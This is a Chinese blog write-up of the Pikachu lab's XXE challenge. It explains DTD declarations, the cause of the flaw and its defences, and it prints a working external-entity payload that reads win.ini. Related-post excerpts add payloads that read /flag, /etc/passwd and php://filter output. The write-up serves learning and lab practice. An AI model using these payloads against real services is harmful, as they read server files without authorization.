【web-ctf】ctf-pikachu-xxe

已于 2023-05-24 08:43:42 修改
阅读量262 收藏 1
点赞数
分类专栏: ctf 文章标签: php 开发语言
于 2022-08-23 09:41:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dajian1040556534/article/details/126477766
版权

文章目录

XXE(xml external entity -injection,xml外部实体注入)

XML文档结构
在这里插入图片描述

DTD(Document Type Definition,文档类型定义,用来为XML文档定义语义约束)

  1. DTD内部声明

     <!DOCTYPE 根元素 [元素声明]>

  2. DTD外部引用

     <!DOCTYPE 根元素名称 SYSTEM "外部DTD的URI">

  3. 引用公共DTD

     <!DOCTYPE 根元素名称 PUBLIC "DTD标识名" "公用DTD的URI">

漏洞产生原因
漏洞产生原因
在这里插入图片描述
代码意义:导入外部实体,用file协议读取etc/passwd文档并赋值给f,打印f

外部引用可以支持http,file,ftp等协议

如果一个接口支持接收xml数据,且没有对xml数据做任何安全上的措施,就可能导致XXE漏洞

simplexml_load_string()函数:将xml文档转换为SimpleXMLElement对象

注:php里面解析xml用的是libxml,其在>=2.9.0的版本中,默认禁止解析xml外部实体内容

漏洞举例

  1. 构造一个恶意xml文档
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///c:/windows/win.ini">
]>
<x>&f;</x>
  1. 将恶意xml内容填入框中,发现返回了c:/windows/win.ini的内容
    在这里插入图片描述
    攻击成功。

总结

现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。

防范措施:

  1. 禁止解析外部实体内容
  2. 过滤敏感文件
过动猿
关注
专栏目录
渗透测试之突破口——web服务突破
m0_61506558的博客
10-17 560
任意用户注册可爆破用户名爆破用户名,密码用户名注入万能密码用户名Xss修改返回包信息,登入他人账户修改cookie中的参数,如user,adminid等HTML源码、JS等查看信息搜集一章后台登录参数修改为注册参数/reg、/register、/sign等密码重置1.重置一个账户,不发送验证码,设置验证码为空发送请求。2.发送验证码,查看相应包3.验证码生存期的爆破4.修改相应包为成功的相应包5.手工直接跳转到校验成功的界面。
渗透测试工具网址--自用
CC__Faker的博客
06-04 2334
信息收集 子域名查询 Layer子域名挖掘机 Site百度语法 crt.sh cdn绕过 CDN历史记录:x.threatbook.cn 历史cdn解析记录:https://securitytrails.com/domain/www.baidu.com/history/a 子域名查询工具:https://seuritytrails.com/list/apex_domain/caredaily.com 查网址cdn :dnsdb.io 查网址cdn,子域名:crt.sh GOBUSTER - 目
XXE漏洞学习之CTF
qq_46085232的博客
04-09 631
两道有关XXECTF题目盲猜过程总结Vulnhub练习题过程总结 盲猜 题目地址:http://web.jarvisoj.com:9882/ 过程 访问题目地址 提交数据,进行抓包 看到数据提交这里,以为是基于json格式的sql注入,结果不是的,看页面源代码也看不出啥的,只怪自己的太菜。后来,才知道这里靠xxe漏洞,盲猜服务端能接受xml格式数据,修改Content-tpye值,并提交xml格式的playload。 修改数据包,进行提交,获取flag(这里我通过读取etc/passwd知道有hom
CTFxxe
qq_37410729的博客
10-26 1823
xxe漏洞即我们可以进行外部实体注入,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 两个writeup 第一题: bp抓包 然后就可以进行xml注入了 这是两种xxe,我们先试第二种(因为源代码并没有标注flag在什么文件中) 然后进内网 然而并进不去,那就只能找存活主机了。 直接暴力寻找 第二题: 按照上题的思路走 但是并没有找到flag。。。。 最后只能去文件里找了,但是题目没有标明具体flag在那个文件,只能试一下/flag文
CTF学习笔记之XXE
克格莫(有需要的私信)
07-08 1176
一直对XXE理解不是很深入,今天仔细研究一下XXE以及CTF里面的XXE题型 0x00 XML基本格式 XML 文档有自己的一个格式规范,这个格式规范是由 DTD控制的。文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 带有 DTD 的 XML 文档实例: <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (
CTFSHOW xxe
羽的博客
01-11 3344
web373 payload <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <yu22x> <ctfshow>&xxe;</ctfshow> </yu22x> web374、375、376 payload <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64
web-ctfctf-pikachu-file_download
热门推荐
一个努力生活的人的博客
08-21 2万+
ctf-pikachu-filedownload
WEB漏洞——XXE
qq_63594215的博客
04-12 931
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
owasp top10之XXE漏洞
赤赤三的博客
03-21 754
XXE漏洞 XML: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 XXE( XML External Entity 外部实体注入,只能读服务器文件,但是执行不了系统命令): XXE(XML外部实体注入,XML External Entity) ,在应用程序解析XML输入时,当允许引用外部实体时,可构造恶意内容,导致读取任意文件、探测内网...
XXE漏洞原理和案例实验演示;ssrf漏洞原理和实验案例演示
qq_44696653的博客
06-03 851
一、XXE漏洞原理和案例实验演示 XXE(xml external entity -injection“) 1.XML xml是一种可扩展的标记语言,可用来存储数据、传输数据 XML格式: 第二部分:DTD DTD:Document Type Defintion 文档类型定义,用来为XML文档定义语义约束。来约束XML文档格式。DTD中不同类型: DTD外部实体举例: 外部引用可以支持htt...
CTF-[XXE学习记录]
qq_53142368的博客
06-07 1057
1.XXE 关于xml我就不详细说了,想看的话从我之前的文章找找,有关于xml的概念和怎么构造。 XML的设计宗旨是传输数据,而非显示数据。XML是不作为的,XML是不会做任何事情,XML 被设计用来结构化、存储以及传输信息。 XML是纯文本,且允许创作者定义自己的标签和文档结构,是独立于软件和硬件的信息传输工具。 0x01.DTD 文档类型定义(DTD)可定义合法的XML文档构建模块,DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 1.内部的DOCTYPE声明 假如DTD被包含在XML源
XXE CTF题目
草儿也忧伤的博客
05-14 1884
** XXE CTF题目 **https://www.jianshu.com/p/68d8ae78cc45 直接点链接看吧
CTF-WebXXE学习笔记(附ctfshow例题)
最新发布
jayq1的博客
05-29 1232
XXE学习笔记
ctfshowXXE
njh18790816639的博客
05-26 396
XXE(XML External Entity Injection) 全称为 XML 外部实体注入。 web373 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input');//以php伪协议接收一个值 if(isset($xmlfile)){ $dom = new DOMDocument();//创建内部类Document对象 $dom->l
CTF-XXE(持续更新,欢迎分享更多相关知识点的题目)
m0_74317362的博客
08-28 1404
进来看到然后一起看。
CTF XXE漏洞攻击
夏日 の blog
05-07 3821
文章目录Fake XML CookbookTrue XML CookbookISCC 未知的风险-1参考 Fake XML Cookbook F12 查看源码: function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || ...
CTFSHOW—XXE
灰太的表格的博客
01-31 435
(睡了一下午打算,通宵学习hhhh) web373 wa1ki0g标签可以随便改,ctfshow这个不可以。 !DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <wa1ki0g> <ctfshow>&xxe;</ctfshow> </wa1ki0g>
ctfshow_XXE
qq_45951598的博客
03-24 335
文章目录WEB373 WEB373 这里先放看一下理解漏洞之 XXE 漏洞 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); //创建内部类Document对象 $dom->loadXML($xmlfile, LIBXML_NOENT |
XML、XXE注入与CTF下的XXE
sGanYu
10-27 1833
在学习XXE漏洞之前,首先一起学习一下什么是XML XML是什么? 是种可扩展标记语言,本质上被设计用来传输、存储数据以及结构化,而非显示数据,可以简单理解为不能做任何事的纯文本 常见的XML结构如下: <?xml version="1.0" encoding="utf-8"?>#XML声明 <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)>&
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值